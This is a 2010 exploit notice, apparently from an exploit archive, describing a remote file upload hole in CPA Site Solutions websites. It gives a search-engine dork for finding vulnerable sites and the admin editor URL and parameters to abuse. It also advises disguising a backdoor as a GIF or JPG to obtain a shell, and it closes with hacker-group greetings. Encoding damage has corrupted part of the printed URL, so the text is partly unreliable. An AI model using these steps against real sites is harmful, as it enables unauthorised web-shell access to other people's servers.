CPA Site Solutions Remote File Upload Vulnerability.pdf

1 ########################################################################### 2 # |REMOTE FILE UPLOAD VULNERABILTY| # 3 # .:|cpasitesolutions|::. # 4 ########################################################################### 5 AUTHOR : R3VAN_BASTARD 6 SITE : www.sux0r.net 7 PROVIDER: http://www.cpasitesolutions.com 8 DORK : intext:Powered by CPA Site Solutions 9 ########################################################################### 10 [x] EXPLOIT: 11 /admin/editor_files/image.php?in_wp=1&return_function=〈=en−us.php&folder=galleries/sm−icons/&instance_img_ dir=&sort_by=name&sort_dir=asc&thumbnails=1 12 13 [x] You can find new directory by changing this URL: 14 /admin/editor_files/image.php?in_wp=1&return_function=〈=en−us.php&folder="galleries/sm−icons/" <=−change i n this section. 15 you will find new directory.. 16 17 [X] NOTE: Edit your backdoor by adding GIF or JPG source, so you can get the shell. 18 ########################################################################### 19 SALAM HANGAT: 20 21 VALENCIA | S3T4N | YOGA0400 | MADONK | KECEMPLUNG KALEN | VRS−HCK | JACK | 22 YUDIS TIRA | DECLINED | OON_BOY | LUQMAN | ANGKIRANGAN JUMIO+PAIJO | NOGE | 23 YADOY666 | ALL MAINHACK | SERVER IS DOWN | 24 ########################################################################### Page 1/1 CPA Site Solutions Remote File Upload Vulnerability R3VAN_BASTARD 02/09/2010